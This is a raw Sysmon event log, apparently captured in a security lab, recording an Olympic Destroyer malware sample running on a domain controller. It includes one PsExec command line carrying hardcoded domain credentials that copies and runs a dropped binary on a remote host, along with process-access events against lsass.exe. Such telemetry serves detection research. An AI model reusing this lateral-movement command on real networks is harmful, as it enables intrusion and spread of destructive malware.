10:57:31.294{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.294{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-131B-6216-5106-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.300{C8EA50B7-131B-6216-5106-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.294{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-131B-6216-5106-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.294{C8EA50B7-1315-6216-4006-000000003802}6280C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000217816Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:32.872{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E7E3D50C888E9FB265B87625FA4F998,SHA256=931C32C882586FE507E03580029509E8C278A3087D7BB9C6507579353DBF5375,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.810{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.609{C8EA50B7-F2AD-6215-C000-000000003802}48564804C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.609{C8EA50B7-F2AD-6215-C000-000000003802}4856400C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.609{C8EA50B7-F2AD-6215-C000-000000003802}48564804C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.609{C8EA50B7-F2AD-6215-C000-000000003802}48564804C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.609{C8EA50B7-F2AD-6215-C000-000000003802}4856400C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.609{C8EA50B7-F2AD-6215-C000-000000003802}4856400C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.609{C8EA50B7-F2AD-6215-C000-000000003802}4856400C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.593{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.593{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.593{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.593{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.593{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293129Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.562{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DD24E11F98A6EDC40CE84FD683A53CD,SHA256=4CC2990ADC50BDF329B0DE7854528638135A574F82D6379A499050E6FF5D404F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293128Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.509{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293127Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.509{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293126Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:32.478{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217817Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:33.889{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53DF69E4E2CD5D10832D72F7749A4910,SHA256=FFEA872CE58AB2F6E887296D227F94E36F8D11273160D298FC24B1C7042997F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:33.595{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4724AD6660B9387A753B21BAF815FA46,SHA256=35CD889672388A90B0396F65F425DFDC5EDF3B21EEE2948729595556A62770DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:33.480{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=2C778440DB560586405E37D86BD89302,SHA256=5342385D69FCF940257EF49694A41D09ED727DA4025AB05AD2653E097F42145F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:33.395{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=DC48E49F2902CFE8585748D9C6C73693,SHA256=5191BBD01C422CA3978353E345FCD1B8558EA9BC7D319C77F60319939AD06C7C,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000293143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:33.049{C8EA50B7-1315-6216-4906-000000003802}884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000217819Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:34.906{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EED984D8640E7FD6419D889B13C36D2D,SHA256=754E7475BDCA08321F378CC776BA5A5F149DFDEBA10CEA217056AABBC2C29230,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.979{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-131E-6216-5306-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.979{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.979{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.979{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.979{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 